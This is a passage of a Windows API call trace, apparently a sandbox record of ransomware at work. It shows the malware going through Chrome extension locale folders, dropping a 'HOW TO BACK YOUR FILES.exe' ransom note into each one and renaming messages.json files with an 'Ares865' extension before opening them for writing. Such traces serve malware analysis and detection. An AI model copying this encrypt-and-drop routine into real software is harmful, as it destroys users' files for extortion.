HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT" [0102.936] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT" [0102.936] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.937] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.937] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.937] GetLastError () returned 0x0 [0102.938] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f57450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed0a140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed0a140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.938] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.938] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.938] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.Ares865") returned 164 [0102.938] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.940] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0102.943] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR" [0102.943] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR" [0102.943] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.943] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.943] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.944] GetLastError () returned 0x0 [0102.944] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f57450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed302a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed302a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.944] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.944] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.Ares865") returned 164 [0102.944] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=246) returned 1 [0102.949] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl" [0102.949] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl" [0102.949] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.949] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.950] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.950] GetLastError () returned 0x0 [0102.950] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.950] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f57450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed302a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed302a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.950] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.950] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.Ares865") returned 161 [0102.951] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=257) returned 1 [0102.958] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no" [0102.958] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no" [0102.959] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.959] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.959] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.959] GetLastError () returned 0x0 [0102.960] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.960] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f312f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed302a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed302a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.960] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.960] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.960] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.Ares865") returned 161 [0102.960] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.962] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=218) returned 1 [0102.965] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl" [0102.965] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl" [0102.965] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.965] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.966] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.966] GetLastError () returned 0x0 [0102.966] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f312f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed302a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed302a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.966] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.966] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.966] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.Ares865") returned 161 [0102.967] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.968] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=242) returned 1 [0102.972] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms" [0102.972] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms" [0102.972] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.972] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 